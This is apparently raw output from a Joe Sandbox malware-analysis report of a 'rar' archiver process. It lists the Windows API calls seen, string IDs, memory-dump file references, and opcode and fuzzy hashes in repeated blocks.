                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD15C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                                • Instruction ID: b6f743e9b413aa81ef0abe656ba455fcd84226c9d6061da086a9edd6dc22c0b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC316F32618B5582E7608F51F5547AA77A1F799BB8F604329FAAC47BC8CF3DD0448B40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E60B6D0: Sleep.KERNEL32(?,?,?,?,00007FF60E5DCBED,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E60B730
                                                                                                                                                                                                                                                • new.LIBCMT ref: 00007FF60E5FCFD9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                • String ID: rar$rev
                                                                                                                                                                                                                                                • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                                • Opcode ID: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
                                                                                                                                                                                                                                                • Instruction ID: 95c74d3c1bcc7ced7263d7b988900195d07314c8e9ef58c91b48c9983d927988
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9A1E122A496A281EF16DB20D1643BD6375FF64784F654831FA5D876C6EF2EE540C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                                • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                                • Instruction ID: c700a56ff57613fd3a9616979f08b1d5f97d57d9a2f036e241073e00dbbbdb62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57512862B28BD146E7358B35A8403696A91EB70B90F18D235F6ADC7BD5CF2CD8449701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                                                • String ID: System Volume Information\
                                                                                                                                                                                                                                                • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                                                • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                                • Instruction ID: 5c33f1f8b18d26acbbfd8f98a1fe2bb34214314c9c63a17f65e5763274487c5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA312422A2D6A145FB91EB21F1602BE2B60AF65BC0F644431FE8D87796CE3CF4419700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: snprintf
                                                                                                                                                                                                                                                • String ID: $%s$@%s
                                                                                                                                                                                                                                                • API String ID: 4288800496-834177443
                                                                                                                                                                                                                                                • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                                • Instruction ID: 3ea9b55f593bedb1e1b7c837d2eb92737cbe0096fc462c48c7b9936c868fa2b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F331A072B29AB295EA50CF65F4407BA2760FB65788F600032FE0D97B99DE3DE505E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                                • String ID: Adding %-58s
                                                                                                                                                                                                                                                • API String ID: 2948472770-2059140559
                                                                                                                                                                                                                                                • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                                • Instruction ID: be3cbf6f8a5d99f1822a238a13740603979b48b26ebec37da2795c9ea56f4c8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38118266B28B6185EB108F56F940069BBA1FFA4FD0F648539FE0CC3325EE3CE5019244
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                                • String ID: ;%%0%du
                                                                                                                                                                                                                                                • API String ID: 233258989-2249936285
                                                                                                                                                                                                                                                • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                                • Instruction ID: 234c91b444d2327d4f7c1a7830cc146bf9b65e1118bfb49f42583e6dff1afdd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11C832B1869046E7219B64F4603E97360FBA8784F694531FB8C87795DE3CE545CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                                                • API String ID: 564652978-2248577382
                                                                                                                                                                                                                                                • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                                • Instruction ID: dd38d9f6bc0214518b3630aff46d1e74254fbae03a5e8460b6dca6843e69280e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AE01A26E2882252EA54B775FC810B43251AF71774FB04730F03EC21E29F2CA54AE301